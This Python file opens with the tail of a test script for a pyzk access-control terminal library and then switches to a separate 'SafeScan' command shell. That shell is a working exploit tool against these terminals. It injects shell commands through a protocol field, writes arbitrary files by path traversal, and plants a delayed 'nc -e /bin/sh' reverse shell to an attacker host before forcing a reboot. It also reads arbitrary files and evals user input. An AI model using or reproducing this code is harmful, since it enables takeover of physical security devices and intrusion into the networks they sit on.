Test script to test/show several functions of the terminal spec/lib.
WARNING: Apply this test to devices that aren't under current use,
if a deployed device is used, remember to upload the data to
the device(Sync) using the ZKAccess software, that will
overwrite any changes made by the script.
Author: Alexander Marin <*****@*****.**>
"""
time.sleep(0) # sometimes a delay is useful to se
ip_address = '192.168.19.152' # set the ip address of the device to test
machine_port = 4370
z = pyzk.ZKSS()
print_header("TEST OF TERMINAL FUNCTIONS")
# connection
print_header("1.Connection Test")
print_info("First, connect to the device and then disable the device")
z.connect_net(ip_address, machine_port)
z.disable_device()
# get/set time
print_header("2.Set/Get time test")
print_info("The time is ")
print_info("Get current time")
print(z.get_device_time())
class SafeScan(cmd.Cmd):
"""Simple command prompt for SafeScan devices"""
host = ''
z = pyzk.ZKSS()
def do_connect(self, line):
try:
self.z.connect_net(self.host, 4370)
self.z.disable_device()
print("Connected to {}".format(self.host))
except:
print("Error: connection")
def do_write_lcd(self, line):
"""Write to the LCD screen"""
try:
payload = bytearray()
line += '\x00\x00'
message = bytearray([0x00] * 50)
message[0:10] = 'aaaaaaaaaa'.encode()
payload.extend(struct.pack('<bbb10s', 0, 0, 0, message[0:10]))
# payload.extend(line.encode())
self.z.send_command(defs.CMD_WRITE_LCD, payload)
self.z.recv_reply()
print(self.z.last_payload_data.decode('ascii'))
print(self.z.last_reply_code)
except Exception:
traceback.print_exc()
def do_eval(self, line):
try:
command = "self.z." + line
print("Executing: {}".format(command))
print(eval(command))
except Exception:
print("Error: eval")
traceback.print_exc()
def do_get(self, line):
try:
print(self.z.get_device_info(line))
except Exception:
print("Error: eval")
traceback.print_exc()
def do_set(self, line):
try:
args = line.split(' ')
param = args[0]
value = args[1]
print(self.z.set_device_info(param, value))
except Exception:
traceback.print_exc()
def do_EOF(self, line):
try:
self.z.enable_device()
self.z.disconnect()
except Exception:
traceback.print_exc()
finally:
return True
def do_command_exec(self, line):
if not len(line):
print(
"[*] Usage: command_exec <cmd>\n[*] Output will not be returned, but you could write to a file and get it afterwards\n"
)
return True
try:
# prepare data
self.z.send_command(1500, struct.pack('<II', 1, 1))
self.z.recv_reply()
# send data
self.z.send_command(1501, 'a'.encode())
self.z.recv_reply()
# apply data
data = bytearray()
data.extend(struct.pack('<I', 1700))
payload = '; ' + line + '; echo \x00\x00'
data.extend(payload.encode())
self.z.send_command(110, data)
self.z.recv_reply()
except Exception:
traceback.print_exc()
def do_write_file(self, line):
if not len(line) or len(line.split(' ')) != 2:
print("[*] Usage: do_exploit_moto <file> <dest>")
return True
file = line.split(' ')[0]
dest = line.split(' ')[1]
if dest[0] != '/':
dest = '/' + dest
dest_final = "../../.." + dest + '\x00\x00\x00'
try:
print("[-] Creating {}".format(file))
with open(file, 'r') as fp:
payload = fp.read()
# prepare data
self.z.send_command(1500,
struct.pack('<II', len(payload), len(payload)))
self.z.recv_reply()
# send data
self.z.send_command(1501, payload.encode())
self.z.recv_reply()
# apply data
data = bytearray()
data.extend(struct.pack('<I', 1700))
data.extend(dest_final.encode())
self.z.send_command(110, data)
self.z.recv_reply()
except Exception:
traceback.print_exc()
def do_auto_pwn_ta(self, line):
if not len(line) or len(line.split(':')) != 2:
print("[*] Usage: write_file_pwn <LHOST:LPORT>")
return True
try:
print("[-] Creating test.sh")
payload = "(sleep 60 && nc {} -e /bin/sh)&".format(line)
filename = "test.sh\x00"
# prepare data
print("[-] Preparing payload")
self.z.send_command(1500,
struct.pack('<II', len(payload), len(payload)))
self.z.recv_reply()
# send data
print("[-] Sending payload")
self.z.send_command(1501, payload.encode())
self.z.recv_reply()
# apply data
print("[-] Saving payload")
data = bytearray()
data.extend(struct.pack('<I', 1700))
data.extend(filename.encode())
self.z.send_command(110, data)
self.z.recv_reply()
time.sleep(1)
print("[-] Sending reboot command")
self.z.restart()
print(
"[+] Done. Device will reboot now.\nTo catch shell: nc -nlvp {}"
.format(line.split(':')[1]))
except Exception:
traceback.print_exc()
def do_get_file(self, line):
file = line.split(' ')[0]
save_as = None
if len(line.split(' ')) > 1:
save_as = line.split(' ')[1]
try:
self.z.send_command(1702, str.encode(file + '\x00'))
self.z.recv_long_reply()
if save_as and len(self.z.last_payload_data.decode()):
with open(save_as, 'w') as fp:
fp.write(self.z.last_payload_data.decode())
print("Saved as {}".format(save_as))
else:
print(self.z.last_payload_data.decode())
except Exception:
traceback.print_exc()
